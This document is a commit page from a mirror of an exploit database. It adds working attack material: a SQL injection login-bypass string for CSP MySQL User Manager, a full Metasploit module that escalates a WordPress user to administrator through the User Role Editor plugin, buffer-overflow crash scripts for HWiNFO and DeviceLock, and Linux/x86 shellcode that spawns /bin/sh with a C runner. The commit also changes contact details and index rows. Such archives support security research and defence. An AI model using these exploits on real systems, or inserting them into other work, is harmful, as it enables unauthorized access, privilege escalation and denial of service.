bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-07

Browse source 
11 changes to exploits/shellcodes

HWiNFO 5.82-3410 - Denial of Service

DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
CSP MySQL User Manager 2.3.1 - Authentication Bypass
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation

Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)
This commit is contained in:
Offensive Security 2018-05-07 05:01:44 +00:00
parent 39c7c53159
commit a066ef9212
13 changed files with 401 additions and 12 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
exploits/linux/webapps/44589.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757
##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ _____/ |_
| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
\/ \/ \/ \/ \/ \/ \/
.__ _____ __ .__
|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___ >
\/ \/ \/ |__| \/
.__
______ ______________ _|__| ____ ____ ______
/ ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
\___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
/____ >\___ >__| \_/ |__|\___ >___ >____ >
\/ \/ \/ \/ \/
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-)
login : admin' or ' 1=1--
password: hammamet informatique services

4
exploits/php/webapps/40804.txt
View file

@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info@tad.bg
# Website: http://tad.bg <https://tad.bg/en/>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8

4
exploits/php/webapps/40971.txt
View file

@ -3,8 +3,8 @@
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.bg
# Website: http://tad.bg <http://tad.bg/>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1 - Description

4
exploits/php/webapps/41919.txt
View file

@ -4,8 +4,8 @@
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits

4
exploits/php/webapps/41920.txt
View file

@ -4,8 +4,8 @@
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

4
exploits/php/webapps/41921.txt
View file

@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

4
exploits/php/webapps/41922.txt
View file

@ -4,8 +4,8 @@
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Contact: info@tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description

174
exploits/php/webapps/44595.rb Executable file
View file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
'Description' => %q{
The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
check within its update user profile functionality ("update" function, contained
within the "class-user-other-roles.php" module).
Instead of verifying whether the current user has the right to edit other users'
profiles ("edit_users" WP capability), the vulnerable function verifies whether the
current user has the rights to edit the user ("edit_user" WP function) specified by
the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
user id is the current user's id, this check is always bypassed (i.e. the current
user is always allowed to modify its profile).
This vulnerability allows an authenticated user to add arbitrary User Role Editor
roles to its profile, by specifying them via the "ure_other_roles" parameter within
the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
clicked).
By default, this module grants the specified WP user all administrative privileges,
existing within the context of the User Role Editor plugin.
},
'Author' =>
[
'ethicalhack3r', # Vulnerability discovery
'Tomislav Paskalev' # Exploit development, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '8432'],
['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
],
'DisclosureDate' => 'Apr 05 2016',
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
OptString.new('USERNAME', [true, 'WordPress username']),
OptString.new('PASSWORD', [true, 'WordPress password']),
OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
])
end
# Detect the vulnerable plugin by enumerating its readme.txt file
def check
readmes = ['readme.txt', 'Readme.txt', 'README.txt']
res = nil
readmes.each do |readme_name|
readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
vprint_status("Checking #{readme_url}")
res = send_request_cgi(
'uri' => readme_url,
'method' => 'GET'
)
break if res && res.code == 200
end
if res.nil? || res.code != 200
# The readme.txt file does not exist
return Msf::Exploit::CheckCode::Unknown
end
version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
return version_res
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
# Search for specified data within the provided HTTP response
def check_response(res, name, regex)
res.body =~ regex
result = $1
if result
print_good("#{peer} - WordPress - Getting data - #{name}")
else
vprint_error("#{peer} #{res.body}")
fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
end
return result
end
# Run the exploit
def run
# Check if the specified target is running WordPress
fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?
# Authenticate to WordPress
print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
cookie = wordpress_login(username, password)
fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
print_good("#{peer} - WordPress - Authentication - OK")
# Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
url = normalize_uri(wordpress_url_backend, 'profile.php')
print_status("#{peer} - WordPress - Getting data - #{url}")
res = send_request_cgi({
'method' => 'GET',
'uri' => url,
'cookie' => cookie
})
if res and res.code == 200
wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option selected=\'selected\'\>(.+?(?=\<))\</)
email = check_response(res, "email", /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
user_id = check_response(res, "user_id", /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
else
fail_with("#{peer} - WordPress - Getting data - Server response (code #{res.code})")
end
# Send HTTP POST request - update the specified user's privileges
print_status("#{peer} - WordPress - Changing privs - #{username}")
res = send_request_cgi({
'method' => 'POST',
'uri' => url,
'vars_post' => {
'_wpnonce' => wp_nonce,
'_wp_http_referer' => URI::encode(url),
'from' => 'profile',
'checkuser_id' => checkuser_id,
'color-nonce' => color_nonce,
'admin_color' => 'fresh',
'admin_bar_front' => '1',
'first_name' => '',
'last_name' => '',
'nickname' => nickname,
'display_name' => display_name,
'email' => email,
'url' => '',
'description' => '',
'pass1' => '',
'pass2' => '',
'ure_other_roles' => datastore['PRIVILEGES'],
'action' => 'update',
'user_id' => user_id,
'submit' => 'Update+Profile'
},
'cookie' => cookie
})
# check outcome
if res and res.code == 302
print_good("#{peer} - WordPress - Changing privs - OK")
else
fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
end
end
end
# EoF

39
exploits/windows/dos/44593.py Executable file
View file

@ -0,0 +1,39 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
# Date: 05-04-18
# Vulnerable Software: HWiNFO 5.82-3410
# Vendor Homepage: https://www.hwinfo.com/
# Version: 5.82-3410
# Software Link: https://www.hwinfo.com/files/hwi_582.exe
# Tested On: Windows 7 x86
#
# PoC:
# 1. generate hwinfo.txt, copy contents to clipboard
# 2. open app, select Report, Create
# 3. choose Export format XML
# 4. paste hwinfo.txt contents into filename field
# 5. select Next, Next
#
# app crashes & EIP overwrite;
# !mona seh > only ppr, non-safeseh module contains startnull
# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
#
filename="hwinfo.txt"
#offset 530
junk = "A"*526
seh = "B"*4
nseh = "C"*4
fill = "D"*9465
buffer = junk + seh + nseh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

85
exploits/windows/local/44590.txt Normal file
View file

@ -0,0 +1,85 @@
# Exploit Title: DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://www.devicelock.com/freeware.html/
# Version: 5.72
# CVE : CVE-2018-10655
# Security Issue:
DeviceLock Plug and Play Auditor "DLPnpAuditor.exe" is vulnerable to a Unicode type of buffer overflow, when supplied a specially crafted textfile using the "scan network" from file option.
The buffer overload payload will get converted to unicode character encoding. Unicode support is used by applications for internationalization purposes allowing a consistent way to visually
represent different character sets on most systems around the world.
e.g.
Before our buffer overflow payload was put on the stack it was expanded with 0x00 so "RRRR" transforms to Unicode representation of "00520052"
(52 is HEX for Ascii char R) containing 0's (NULL) values. Therefore, attempting to exploit the vulnerable program needs an unicode compatiable address
(address with null bytes) and using encoding methods like "alpha2" encoder tool.
Stack dump:
SEH chain of main thread
Address SE handler
0018EE00 ntdll.771B34DD
0018FBD4 00520052
00520052 A42F0000
E5C1411F *** CORRUPT ENTRY ***
EAX 00000000
ECX 00520052
EDX 771B34DD ntdll.771B34DD
EBX 00000000
ESP 0018EDEC
EBP 0018EE0C
ESI 00000000
EDI 00000000
EIP 00520052
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
# Exploit/POC:
1) Create POC textfile
2) Under File menu "Scan Network" choose "From file" under drop down menu.
3) Choose the exploit file select the Scan "Domain" box and run it.
#Unicode SEH Buffer Overflow
#https://www.devicelock.com/download/
PAYLOAD="A"*1036+"R"*8+"B"*56 #Control SEH
file=open("devicelock-bof.txt","w")
file.write(PAYLOAD)
file.close()
print 'DeviceLock Plug and Play Auditor v5.72 (freeware)'
print 'Exploit POC file created.'
print 'hyp3rlinx'
# Disclosure Timeline:
Vendor Notification: April 17, 2018
No reply
Vendor Notification: April 22, 2018
No reply
May 6, 2018 : Public Disclosure

4
files_exploits.csv
View file

@ -5965,6 +5965,7 @@ id,file,description,date,author,type,platform,port
44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9701,6 +9702,7 @@ id,file,description,date,author,type,platform,port
44573,exploits/windows/local/44573.txt,"Adobe Reader PDF - Client Side Request Injection",2018-05-02,"Alex Inführ",local,windows,
44581,exploits/windows/local/44581.c,"Windows - Local Privilege Escalation",2018-04-24,XPN,local,windows,
44586,exploits/windows_x86-64/local/44586.rb,"Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,
44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39280,3 +39282,5 @@ id,file,description,date,author,type,platform,port
44583,exploits/multiple/webapps/44583.txt,"Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection",2014-01-14,"Takeshi Terada",webapps,multiple,
44585,exploits/php/webapps/44585.txt,"WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting",2018-05-04,B0UG,webapps,php,
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -880,3 +880,4 @@ id,file,description,date,author,type,platform
44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86

1 id file description date author type platform
880 44509 shellcodes/linux_x86/44509.c Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes) 2018-04-24 absolomb shellcode linux_x86
881 44510 shellcodes/linux_x86/44510.c Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes) 2018-04-24 absolomb shellcode linux_x86
882 44517 shellcodes/linux_x86/44517.c Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes) 2018-04-24 Nuno Freitas shellcode linux_x86
883 44594 shellcodes/linux_x86/44594.c Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes) 2018-05-06 Nuno Freitas shellcode linux_x86

45
shellcodes/linux_x86/44594.c Normal file
View file

@ -0,0 +1,45 @@
/*
; Title : Execve /bin/sh Shellcode encoded with NOT
; Date : May, 2018
; Author : Nuno Freitas
; Twitter : @nunof11
; SLAE ID : SLAE-1112
; Size : 27 bytes
; Tested on : i686 GNU/Linux
section .text
global _start
_start:
xor ecx, ecx
mul ecx
push ecx
; instructions to avoid having the strings "nib/" and "hs//" pushed directly
mov edi, 0x978CD0D0
mov esi, 0x91969DD0
not edi
not esi
push edi
push esi
mov ebx, esp
mov al, 0xb
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}